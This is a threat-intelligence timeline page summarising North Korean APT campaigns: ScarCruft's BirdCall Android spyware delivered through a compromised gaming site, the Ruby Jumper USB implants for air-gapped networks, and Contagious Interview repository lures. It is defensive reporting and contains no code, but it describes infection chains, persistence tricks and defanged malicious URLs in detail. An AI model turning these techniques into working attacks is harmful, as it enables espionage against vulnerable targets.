CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

ScarCruft (APT37) Expands Tactics with Ruby Jumper Campaign Targeting Air-Gapped Networks

First reported
Last updated
5 unique sources, 26 articles

Summary

Hide ▲

The **ScarCruft (APT37) Ruby Jumper campaign** and its broader espionage operations continue to evolve, with the group now deploying an **Android variant of the BirdCall backdoor** via a **supply-chain attack on sqgame[.]net**, a Chinese gaming platform targeting Koreans in the **Yanbian region**—a transit hub for North Korean defectors. This marks ScarCruft’s first documented use of **mobile malware in a supply-chain context**, expanding its targeting beyond Windows systems to include **Android devices used by high-risk populations**. The Android BirdCall variant (internally named **'zhuagou'**) collects **geolocation data, contact lists, SMS/call logs, device metadata, and files of interest** (e.g., documents, audio recordings, certificates), while also **recording ambient audio during evening hours** (7 pm–10 pm local time) and using **anti-suspension techniques** (e.g., silent MP3 loops) to evade detection. The malware leverages **Zoho WorkDrive for C2**, with **12 separate accounts identified** in this campaign, aligning with the group’s broader abuse of legitimate cloud services. Earlier campaigns, such as **Ruby Jumper (December 2025–February 2026)**, demonstrated ScarCruft’s focus on **air-gapped network breaches** via **USB-based implants (THUMBSBD, VIRUSTASK)** and **cloud-abused C2 (Zoho WorkDrive)**, alongside **multi-stage infection chains** combining LNK files, PowerShell scripts, and Ruby runtime manipulation. The **supply-chain compromise of sqgame[.]net**—first observed in **late 2024**—involved **poisoned APKs** (`ybht.apk`, `sqybhs.apk`) and a **trojanized Windows DLL** (delivered via an update package) that deployed RokRAT as a precursor to BirdCall. This campaign underscores ScarCruft’s **adaptive tradecraft**, blending **supply-chain compromise with mobile surveillance** to exploit geopolitically sensitive targets. The **iOS game on the platform remained uncompromised**, likely due to Apple’s stringent review process.

Timeline

  1. 05.05.2026 12:04 3 articles · 1d ago

    ScarCruft Deploys Android BirdCall Spyware via Supply-Chain Attack on sqgame[.]net

    In **late 2024–May 2026**, ScarCruft (APT37) compromised **sqgame[.]net**, a Chinese gaming platform targeting Koreans in the **Yanbian region** (a transit hub for North Korean defectors), to distribute an **Android variant of the BirdCall backdoor** via **poisoned APKs** for **Yanbian Red Ten** and **New Drawing** (`sqgame.com[.]cn/ybht.apk`, `sqgame.com[.]cn/sqybhs.apk`). This marks the group’s first use of **mobile malware in a supply-chain context**, expanding its espionage toolkit beyond Windows systems. The Android BirdCall variant—**internally named 'zhuagou'** and under active development across **seven versions (October 2024–June 2025)**—collects **contact lists, SMS/call logs, media files, documents, screenshots, and ambient audio** (recorded between 7 pm–10 pm local time), while using **Zoho WorkDrive for C2 communication**, with **12 separate accounts identified** in this campaign. The compromise also involved a **trojanized Windows DLL** in the platform’s update package, which—after **anti-analysis checks** (e.g., scanning for virtual machine environments and analysis tools)—downloaded and executed **RokRAT**, subsequently deploying the Windows version of BirdCall. The **iOS game remained uncompromised**, likely due to Apple’s review process. ESET **notified sqgame of the compromise in December 2025**, but the **malicious APKs remained available** on the site as of May 2026. The **selective poisoning of Android APKs** underscores ScarCruft’s **targeted approach** to maximizing impact among high-risk populations, aligning with the group’s historical focus on **North Korean defectors, activists, and academics**.

    Show sources
    Open in new tab
  2. 27.02.2026 14:43 3 articles · 2mo ago

    ScarCruft Launches Ruby Jumper Campaign with Zoho WorkDrive C2 and USB-Based Air-Gap Breaches

    In **December 2025**, ScarCruft (APT37) launched the **Ruby Jumper campaign**, introducing **new tactics for breaching air-gapped networks** and abusing **Zoho WorkDrive for C2 communication**. The campaign employs a **multi-stage infection chain** starting with a malicious LNK file that drops a **decoy document** (an Arabic translation of a North Korean article on the Palestine-Israel conflict), an executable payload (**RESTLEAF**), a PowerShell script, and a batch file. The batch script triggers PowerShell, which decrypts and loads RESTLEAF in memory. RESTLEAF authenticates with Zoho WorkDrive using a valid access token to fetch shellcode, which is executed via process injection. This leads to the deployment of **SNAKEDROPPER**, which installs a **Ruby runtime environment** (Ruby 3.3.0) disguised as a USB utility (`usbspeed.exe`) and establishes persistence by replacing the RubyGems default file `operating_system.rb` with a malicious version. A scheduled task (`rubyupdatecheck`) ensures execution every five minutes. SNAKEDROPPER then drops two implants: **THUMBSBD** and **VIRUSTASK**, both Ruby-based and designed to **weaponize removable media (USB drives)**: - **THUMBSBD** creates hidden directories on USB drives to stage operator commands or store exfiltrated data, turning removable media into a **bidirectional covert C2 relay** for air-gapped systems. It supports **keylogging, audio/video capture, file manipulation, and registry modification**, and can distribute the **BLUELIGHT backdoor**. - **VIRUSTASK** acts as a lightweight backdoor that **stages exfiltrated data on USB drives** in hidden or obfuscated form for later retrieval, focusing on **propagating malware to air-gapped systems** via removable media. It replaces legitimate files with malicious shortcuts that execute the Ruby interpreter when opened, but only triggers if the media has **at least 2GB of free space**. SNAKEDROPPER also deploys **FOOTWINE**, a reconnaissance and collection utility disguised as an APK file that harvests documents and supports **keylogging, screenshot capture, audio/video recording, file manipulation, and remote shell commands**. The campaign includes **BLUELIGHT**, an encrypted payload with a shellcode launcher that enables **keylogging, audio/video surveillance, and custom TCP-based C2 communication**, adapting its mode based on network connectivity. The campaign was **discovered in December 2025** and **documented by Zscaler ThreatLabz in February 2026**, confirming the use of **six distinct tools**, five of which (**Restleaf, SnakeDropper, ThumbSBD, VirusTask, FootWine**) were previously undocumented. This represents ScarCruft’s first use of **Zoho WorkDrive for C2** and a **dedicated focus on air-gapped infiltration**, combining **cloud abuse with physical media exploitation** to evade network isolation and achieve persistent surveillance. The **decoy document** indicates targeting of individuals interested in North Korean media narratives, aligning with APT37’s historical victim profiles.

    Show sources
    Open in new tab
  3. 26.02.2026 12:35 1 articles · 2mo ago

    GitLab Bans 131 Accounts Linked to Contagious Interview Campaign

    In February 2026, **GitLab banned 131 accounts** tied to the Contagious Interview campaign, citing their role in distributing **malicious code repositories** targeting developers. Analysis revealed that threat actors primarily used **consumer VPNs (80% of cases)** and **Gmail addresses (90%)** to create accounts, with intermittent use of **dedicated VPS infrastructure** and likely **laptop farms**. The actors leveraged **six legitimate services** to host malware payloads, including **Vercel (49 instances in 2025)**, **JSON Keeper**, **Mocki**, **npoint.io**, **Render**, and **Railway.app**, with Vercel remaining the most prevalent. A **private GitLab project** controlled by the group was also discovered, containing **financial and personnel records** for a North Korean IT worker cell. The records showed **earnings exceeding $1.64 million** between Q1 2022 and Q3 2025, with **detailed spreadsheets tracking quarterly income performance** for individual team members. The project highlighted the operation’s **structured enterprise model**, including **hierarchical oversight**, **defined revenue targets**, and **global facilitator networks** for money laundering and operational resiliency. GitLab’s findings corroborate broader trends in the campaign, including the use of **VS Code tasks**, **obfuscated payloads in fake font files**, and **multi-stage droppers** to evade detection. The platform’s takedown underscores the campaign’s **sustained infrastructure** and **adaptive hosting strategies**, as actors rotate between services to maintain persistence.

    Show sources
    Open in new tab
  4. 10.11.2025 22:29 4 articles · 5mo ago

    Konni Exploits Google's Find Hub for Remote Data Wiping

    North Korean threat actors, including Konni APT (APT37/Kimsuky), have weaponized Google’s Find Hub service to remotely reset Android devices in South Korea, marking the first confirmed instance of a nation-state APT abusing this feature for destructive operations. The campaign, discovered in November 2025, involves a two-stage attack: initial spear-phishing (since July 2024) targeting Android devices via spoofed entities (e.g., National Tax Service), followed by secondary malware distribution through compromised KakaoTalk PC sessions. Attackers compromised the account of a psychological counselor for North Korean defectors on September 5, 2025, using it to distribute a digitally signed MSI installer ('Stress Clear.msi') disguised as a stress-relief program. The installer deployed AutoIt loaders that established persistence via scheduled tasks and C2 communication, fetching RATs like RemcosRAT, QuasarRAT, and RftRAT. Using stolen Google credentials, attackers tracked victim locations via Find Hub and triggered remote wipes when targets were away, delaying discovery and severing communication channels. The attack chain also involved prolonged internal reconnaissance, exfiltration of PII and webcam captures, and exploitation of Find Hub’s location tracking to execute remote resets. This tactic combines device sabotage, credential theft, and social engineering to erase forensic evidence and amplify the campaign’s reach through trusted contacts. The MSI installer’s setup routine deleted traces to hinder analysis, while AutoIt scripts maintained continuous C2 communication.

    Show sources
    Open in new tab
  5. 25.09.2025 16:14 12 articles · 7mo ago

    North Korean Threat Actors Launch Contagious Interview Campaign

    The **Contagious Interview campaign**, attributed to North Korean actors including **Lazarus/BlueNoroff**, has expanded with **new tactics observed in February 2026**, where **malicious Next.js repositories** are used as lures to deliver **in-memory JavaScript malware** via **three distinct execution paths**: 1. **VS Code workspace execution**: Projects with workspace automation configuration (`runOn: "folderOpen"` in `tasks.json`) auto-execute malicious code from Vercel or GitHub gists when the developer opens and trusts the project. 2. **Build-time execution**: Modified JavaScript libraries (e.g., `jquery.min.js`) embedded in repositories activate during `npm run dev`, fetching and executing a JavaScript loader hosted on attacker-controlled infrastructure. 3. **Server startup execution**: Backend modules or route files exfiltrate process environment variables to an external server and execute JavaScript responses in memory within the Node.js server process. The payloads **profile the host**, register with a C2 server for a unique `instanceId`, and deploy a **second-stage controller** that maintains persistence, supports operator-driven discovery/exfiltration, and minimizes disk traces. Microsoft Defender flagged the activity via suspicious outbound Node.js connections, linking it to a broader cluster of threats using **job-themed lures** to blend into developer workflows. This evolution follows the **January 2026 deployment of malicious VS Code projects** and the **December 2025 EtherRAT campaign**, which exploited **React2Shell (CVE-2025-55182)**. The group continues to refine its **multi-stage infection chains**, now leveraging **alternative staging infrastructure** (GitHub gists, URL shorteners, blockchain-based NFT contracts) and **collaborating with North Korea’s fraudulent IT workers (WageMole)**. The campaign remains focused on **cryptocurrency/Web3 developers**, **global tech sectors**, and **espionage-driven financial theft**. **Additional developments** include: - A **malicious npm package (`eslint-validator`)** fetching obfuscated BeaverTail payloads from Google Drive. - A **Windows-specific infection chain** using batch scripts to download Node.js and deploy PyArmor-protected Python malware via `certutil`. - **GitLab’s ban of 131 accounts** tied to the campaign, with threat actors primarily using consumer VPNs, Gmail addresses, and legitimate services (Vercel, JSON Keeper, Mocki) to host payloads. - Discovery of a **private GitLab project** tracking a North Korean IT worker cell’s earnings ($1.64M between Q1 2022–Q3 2025), revealing structured financial oversight and hierarchical operations. - **Okta’s observation** that actors are refining interview tactics, with some scheduling hundreds of interviews to improve success rates in bypassing screening.

    Show sources
    Open in new tab
  6. 10.09.2025 16:04 1 articles · 7mo ago

    ZynorRAT RAT Targets Windows, Linux, and macOS Systems

    A new malware family, ZynorRAT, has been discovered, targeting Windows, Linux, and macOS systems. ZynorRAT is a Go-based remote access trojan that uses a Telegram bot for command and control. The malware supports a wide range of functions, including file exfiltration, system enumeration, screenshot capture, and arbitrary command execution. The Windows version of ZynorRAT is near-identical to its Linux counterpart, indicating ongoing development. ZynorRAT is believed to be the work of a lone actor possibly of Turkish origin.

    Show sources
    Open in new tab
  7. 10.09.2025 14:59 2 articles · 7mo ago

    ChillyHell macOS Backdoor Resurfaces with New Version

    ChillyHell is written in C++ and developed for Intel architectures. The malware is attributed to an uncategorized threat cluster dubbed UNC4487, active since at least October 2022. UNC4487 is a suspected espionage actor that has compromised Ukrainian government websites to deploy ChillyHell. The malware establishes persistence using LaunchAgent, LaunchDaemon, and modifying the user's shell profile. It uses timestomping to modify file timestamps to evade detection. ChillyHell supports commands to launch a reverse shell, download new versions, fetch additional payloads, enumerate user accounts, and conduct brute-force attacks. The malware was notarized by Apple, highlighting that not all malicious code comes unsigned.

    Show sources
    Open in new tab
  8. 01.09.2025 11:26 1 articles · 8mo ago

    Scarcruft (APT37) Launches Operation HanKook Phantom Targeting South Korean Academics

    In September 2025, a new phishing campaign, Operation HanKook Phantom, was discovered. This campaign targets individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers. The campaign uses spear-phishing emails with a lure for a "National Intelligence Research Society Newsletter" containing a ZIP archive attachment with a Windows shortcut (LNK) masquerading as a PDF document. The LNK file drops RokRAT malware, which is capable of collecting system information, executing arbitrary commands, enumerating the file system, capturing screenshots, and downloading additional payloads. RokRAT exfiltrates data via Dropbox, Google Cloud, pCloud, and Yandex Cloud. The campaign also involves a PowerShell script that deploys a dropper, which then runs a next-stage payload to steal sensitive data while concealing network traffic as a Chrome file upload. The lure document used in this instance is a statement issued by Kim Yo Jong, the Deputy Director of the Publicity and Information Department of the Workers' Party of Korea, rejecting Seoul's efforts at reconciliation.

    Show sources
    Open in new tab
  9. 14.08.2025 03:00 2 articles · 8mo ago

    Scarcruft (APT37) Launches Ransomware Campaign Targeting South Korea

    In July 2025, the North Korean threat group Scarcruft (APT37) initiated a new campaign targeting South Korea with a combination of infostealers, backdoors, and ransomware. The campaign, dubbed ChinopuNK, includes multiple malware tools designed for espionage and financial gain. The attacks start with phishing emails containing decoy documents about postal code updates. Once opened, these documents download NubSpy, a backdoor that uses the PubNub cloud service for command-and-control (C2) communication. The group also deploys ChillyChino, a PowerShell backdoor rewritten in Rust, and VCD ransomware, which encrypts specific file paths tailored to individual targets. The campaign is notable for its use of ransomware by a nation-state actor, combining espionage with financial and psychological pressure tactics.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Konni APT leverages EndRAT and KakaoTalk for multi-stage phishing and lateral propagation

A North Korean advanced persistent threat (APT) group, tracked as Konni, conducted a multi-stage spear-phishing campaign to compromise targets and abuse compromised KakaoTalk desktop application sessions for malware propagation. Initial access was achieved via a spear-phishing email masquerading as an appointment notice for a North Korean human rights lecturer, leading to execution of a malicious LNK file. The payload deployed a remote access trojan (RAT) named EndRAT (written in AutoIt), establishing persistence via scheduled tasks and exfiltrating sensitive data. The adversary maintained long-term access on compromised hosts, stole internal documents, and used the victim’s KakaoTalk contacts to selectively propagate malware via ZIP archives disguised as North Korea-related content. The campaign reflects a high-trust abuse strategy, leveraging compromised user accounts to deceive additional targets.

Open in new tab

Lazarus Group Linked to Medusa Ransomware Attacks on U.S. Healthcare

North Korean state-backed hackers from the Lazarus group are targeting U.S. healthcare organizations and entities in the Middle East with Medusa ransomware in financially motivated extortion attacks. The Medusa ransomware-as-a-service (RaaS) operation has impacted over 366 organizations since its launch in 2023, with at least four additional healthcare and non-profit organizations in the U.S. targeted since November 2025. This is the first time Lazarus has been linked to Medusa ransomware, though they have been associated with other ransomware strains. The attacks use a toolset that includes both custom and commodity tools, some of which are linked to another North Korean group, Diamond Sleet. The average ransom recorded in these attacks is $260,000, which is reportedly used to fund espionage operations against defense, technology, and government sectors in the U.S., Taiwan, and South Korea. Symantec has provided indicators of compromise (IoCs) to help defenders prevent these attacks. The Stonefly sub-group of Lazarus, also known as Andariel, has been involved in ransomware operations for the past five years. Rim Jong Hyok, an alleged Stonefly member, was indicted by the US Justice Department for ransomware campaigns targeting US hospitals and healthcare providers. The US Justice Department announced a $10m reward for information related to Rim Jong Hyok.

Open in new tab

Shift Left Security Strategy Fails to Deliver Expected Benefits

The 'shift left' security strategy, which aims to integrate security earlier in the software development lifecycle (SDLC), has failed to deliver its promised benefits. Developers are overwhelmed with cognitive load, and businesses prioritize speed over security, leading to increased risks. A study by Qualys found that 7.3% of container images from public repositories were malicious, with 70% containing cryptomining software. The strategy has shifted the burden onto developers without adequate support, resulting in security being bypassed or ignored. To address these issues, experts recommend a 'shift down' approach, where security is embedded into the infrastructure layer, managed by specialized teams. This approach automates security checks and fixes, reducing the cognitive load on developers and making secure deployment the path of least resistance.

Open in new tab

Infostealer Malware Targets OpenClaw Configuration Files

Infostealer malware has been observed stealing OpenClaw configuration files containing API keys, authentication tokens, and other sensitive secrets. This marks the first known instance of such attacks targeting the popular AI assistant framework. The stolen data includes configuration details, authentication tokens, and persistent memory files, which could enable full compromise of the victim's digital identity. The malware, identified as a variant of the Vidar infostealer, executed a broad file-stealing routine that scanned for sensitive keywords. Researchers predict increased targeting of OpenClaw as it becomes more integrated into professional workflows. Additionally, security issues with OpenClaw have prompted the maintainers to partner with VirusTotal to scan for malicious skills uploaded to ClawHub, establish a threat model, and add the ability to audit for potential misconfigurations.

Open in new tab

ZeroDayRAT Malware Targets Android and iOS Devices

A new commercial spyware platform, ZeroDayRAT, is being advertised on Telegram, offering full remote control over compromised Android (versions 5–16) and iOS (up to version 26) devices. The malware provides extensive surveillance capabilities, including real-time tracking, data theft, and financial fraud. It can log app usage, SMS messages, and notifications, activate cameras and microphones, and steal cryptocurrency and banking credentials. ZeroDayRAT is marketed through Telegram channels and infections are initiated by persuading victims to install malicious binaries via smishing, phishing emails, counterfeit app stores, and links shared through WhatsApp or Telegram. The malware includes a dedicated web-based dashboard displaying device details, app usage, SMS messages, and live activity timeline. It also includes a crypto stealer and targets online banking apps, UPI platforms, and payment services like Apple Pay and PayPal. The malware is sold openly on Telegram with access to a panel featuring sales, customer support, and platform updates channels. ZeroDayRAT support spans Android 5 through 16 and iOS up to 26, and it provides a complete overview of the phone's makeup, including device model, SIM, location data, carrier info, live activity timeline, and recent SMS messages. The malware includes features such as SMS control, keylogger, microphone feed, screen recorder, bank stealer, and crypto stealer. ZeroDayRAT is priced at $2,000, indicating higher-than-average ambitions and targeting specific individuals or enterprises. The malware represents a convergence of nation-state-level capabilities with criminal economics, widening the target market for surveillance malware.

Open in new tab